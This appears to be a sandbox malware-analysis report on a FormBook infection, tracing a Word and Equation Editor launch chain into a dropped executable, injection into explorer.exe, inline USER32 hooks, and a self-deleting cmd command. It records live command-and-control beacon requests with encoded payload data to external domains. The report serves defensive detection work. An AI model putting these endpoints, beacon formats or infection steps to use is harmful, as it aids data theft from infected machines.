                                              Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                              Last-Modified: Wed, 27 Oct 2021 07:18:31 GMT
                                              ETag: "82400-5cf5066baacfe"
                                              Accept-Ranges: bytes
                                              Content-Length: 533504
                                              Vary: User-Agent
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.22 | 49168 | 202.165.66.108 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 27, 2021 16:40:39.572412968 CEST | 568 | OUT | GET /jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj HTTP/1.1
                                              Host: www.filecrev.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 27, 2021 16:40:40.154506922 CEST | 568 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.21.0
                                              Date: Wed, 27 Oct 2021 14:40:40 GMT
                                              Content-Type: application/json; charset=utf-8
                                              Content-Length: 181
                                              Connection: close
                                              X-Powered-By: Express
                                              ETag: W/"b5-7t+tQyc7QpflCZNr+ruKCrIOKs0"
                                              Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 63 6c 69 63 6b 2f 70 72 6f 78 79 6a 73 2f 6a 79 30 62 2f 3f 30 36 33 38 34 44 71 70 3d 54 79 47 44 4a 68 4c 2f 63 41 2b 35 37 77 66 75 66 61 5a 52 79 4d 4d 72 51 6b 38 75 50 64 32 64 36 4e 66 59 38 31 52 73 6a 34 36 62 5a 68 4f 4a 4c 58 67 5a 35 32 32 42 75 70 42 45 37 2b 42 71 51 73 50 38 38 51 3d 3d 26 63 74 3d 58 68 68 34 6e 4c 33 38 59 4e 76 70 6a 22 7d
                                              Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj"}


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.22 | 49169 | 54.156.84.168 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 27, 2021 16:40:56.493159056 CEST | 569 | OUT | GET /jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj HTTP/1.1
                                              Host: www.charlotte-s-creations.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 27, 2021 16:40:56.631287098 CEST | 570 | IN | HTTP/1.1 308 Permanent Redirect
                                              Connection: close
                                              Location: https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj
                                              Server: Caddy
                                              Date: Wed, 27 Oct 2021 14:40:56 GMT
                                              Content-Length: 0


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name | Hook Type | Active in Processes
                                              PeekMessageA | INLINE | explorer.exe
                                              PeekMessageW | INLINE | explorer.exe
                                              GetMessageW | INLINE | explorer.exe
                                              GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function Name | Hook Type | New Data
                                              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
                                              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE5
                                              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE5
                                              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE5

                                              Statistics

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:16:38:18
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f330000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:38:20
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:38:22
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Imagebase:0x1040000
                                              File size:533504 bytes
                                              MD5 hash:E78C85674617F34A2F69FFC8DA6A3C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 38%, ReversingLabs
                                              Reputation:low

                                              General

                                              Start time:16:38:26
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Imagebase:0x1040000
                                              File size:533504 bytes
                                              MD5 hash:E78C85674617F34A2F69FFC8DA6A3C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:16:38:28
                                              Start date:27/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:16:38:42
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\raserver.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                              Imagebase:0x740000
                                              File size:101888 bytes
                                              MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:16:38:46
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\villar8681.exe'
                                              Imagebase:0x49ee0000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis
